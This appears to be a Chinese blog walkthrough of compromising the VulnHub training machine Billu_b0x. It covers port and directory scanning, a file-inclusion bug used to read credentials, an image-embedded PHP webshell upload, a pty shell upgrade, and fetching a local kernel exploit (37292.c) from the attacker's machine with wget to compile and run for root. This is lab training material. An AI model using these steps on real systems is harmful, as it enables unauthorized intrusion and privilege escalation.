VulnHub靶場之Billu_b0x
emmm,好久沒玩靶機實驗了,今天玩一下!!
用vm打開靶機,把網絡適配改爲NAT,然後運行kali和靶機
首先肯定查看kali的ip地址,然後使用nmap命令:nmap -sP 192.168.80.0/24掃描主機
找到了靶機的IP地址,接下來進行端口掃描
nmap命令:nmap -p 1-65535 -sV 192.168.80.129
開放了兩個端口!!先不用管22端口,直接訪問一下80端口:
進入到主頁面得到一句提示sql注入???使用萬能密碼嘗試登錄結果失敗,,,
只能先放棄,看後續是否沒有思路再來繼續剛,先信息收集!!
使用dirbuster和dirb兩個一起爆破一下目錄
dirbuster掃描結果:
Dir found: /cgi-bin/ - 403
File found: /index.php - 200
Dir found: /icons/ - 403
File found: /c.php - 200
File found: /in.php - 200
File found: /show.php - 200
Dir found: /doc/ - 403
File found: /add.php - 200
File found: /test.php - 200
Dir found: /icons/small/ - 403
File found: /head.php - 200
Dir found: /uploaded_images/ - 200
File found: /uploaded_images/c.JPG - 200
File found: /uploaded_images/CaptBarbossa.JPG - 200
File found: /panel.php - 302
File found: /head2.php - 200
Dir found: /server-status/ - 403
dirb掃描結果:
---- Scanning URL: http://192.168.80.129/ ----
+ http://192.168.80.129/add (CODE:200|SIZE:307)
+ http://192.168.80.129/c (CODE:200|SIZE:1)
+ http://192.168.80.129/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.80.129/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.80.129/images/
+ http://192.168.80.129/in (CODE:200|SIZE:47554)
+ http://192.168.80.129/index (CODE:200|SIZE:3267)
+ http://192.168.80.129/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.80.129/phpmy/
+ http://192.168.80.129/server-status (CODE:403|SIZE:295)
+ http://192.168.80.129/show (CODE:200|SIZE:1)
+ http://192.168.80.129/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.80.129/uploaded_images/
+ http://192.168.80.129/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.80.129/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.80.129/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.80.129/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.80.129/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/contrib/
+ http://192.168.80.129/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.80.129/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/js/
==> DIRECTORY: http://192.168.80.129/phpmy/libraries/
+ http://192.168.80.129/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/locale/
+ http://192.168.80.129/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.80.129/phpmy/pmd/
+ http://192.168.80.129/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.80.129/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.80.129/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.80.129/phpmy/scripts/
==> DIRECTORY: http://192.168.80.129/phpmy/setup/
+ http://192.168.80.129/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/themes/
+ http://192.168.80.129/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/webapp (CODE:200|SIZE:6917)
+ http://192.168.80.129/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/frames/
+ http://192.168.80.129/phpmy/setup/index (CODE:200|SIZE:12970)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/lib/
+ http://192.168.80.129/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.80.129/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.80.129/phpmy/setup/validate (CODE:200|SIZE:10)
-----------------
END_TIME: Mon Nov 11 04:50:43 2019
發現存在很多可疑的目錄!
先訪問一下phpmy目錄,看是不是phpmyadmin頁面:
果然是,先放一邊,再逐一進行訪問頁面,先訪問c.php,空白頁面
訪問in.php,發現是phpinfo,而且好像還有文件包含漏洞:
show.php什麼都沒有,空白頁面,add.php好像是一個文件上傳的頁面:
訪問一下test.php得到了一個提示!!!
file參數???這不是剛好和剛纔那文件包含漏洞相吻合??傳遞get參數,不行,,猜測是post,成功:
好的,那麼就可以利用一下這個文件包含漏洞來查看其他文件的內容了
c.php、show.php、in.php、index.php、add.php、head.php、panel.php
想到還有個phpmyadmin頁面,首先先讀取一下phpmyadmin的配置文件,看看能否找到登陸的賬號和密碼:
類似賬號密碼,還是root的?嘗試登錄phpmyadmin,失敗,試試ssh連接一下,畢竟是root
沒想到直接登陸成功,,,,:
實驗完成????還是繼續玩下走吧,,,phpmyadmin還沒登陸成功呢
查看show.php的時候發現,好像是數據庫查詢??:
查看一下c.php,發現一個用戶名密碼,先記下來billu\b0x_billu
等查看完頁面再去嘗試一下是否爲phpmyadmin的賬號密碼,免得麻煩:
add.php就是一個靜態的頁面,根本沒有上傳的功能,,,,
panel.php好像就是首頁登陸成功之後進入的頁面,先放一邊:
還有兩個head頁面都是顯示圖片,,看完之後瞭解到了不少的信息
主要的還是關於c.php頁面中的用戶名和密碼,嘗試是否是phpmyadmin的登錄密碼
直接去嘗試一下,登陸成功:
經過簡單收集,找到了一個用戶名密碼biLLu\hEx_it:
回想到我們當初剛進入頁面時是需要登錄的,猜測這就是登錄賬號和密碼,去嘗試登錄,成功:
發現在增加用戶的頁面有一個上傳地方!!
先去看看源碼的上傳代碼,發現存在漏洞:
看着源碼我們就知道了,可以上傳一個圖片馬,然後利用文件包含!!
文件頭繞過,在後面加上一句話木馬:
成功執行:
這就好辦了,能執行php代碼的圖片,不就和上一個靶場差不多嗎??
直接phpshell腳本一波!
得到shell:
使用python獲取標準shell:python -c 'import pty; pty.spawn("/bin/bash")'
查看一下內核:
emmmm,又是ubuntu還是14年的,,繼續髒牛提權??
結果發現髒牛不行,,,,虛擬機直接崩潰??還是我等的時間不夠長??算了換一種吧
使用cat /etc/issue查看版本號:
直接查找exp:
該目錄下不能創建文件,切換到/tmp下,kali開啓服務,並移動文件到網站根目錄下:
vim /etc/apache2/ports.conf
/etc/init.d/apache2 start
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html
下載文件:wget 192.168.80.128:8888/37292.c
編譯執行文件:
gcc -pthread 37292.c -o 37292 -lcrypt
./37292
成功拿到root權限,實驗完成!!與我們之前ssh連接的一模一樣,,,,
貌似沒有flag,再見~~
總結
這個實驗總的來說與上一個實驗差不多,文件包含,然後反彈shell
最重要的是知道了提權要換方法,不能一條路走到死,提權的時候髒牛不行
就應該想到其他方法,比如說直接找Ubuntu的漏洞利用!!
恩恩,這個實驗也收穫頗多~~望以後繼續努力!!!!加油!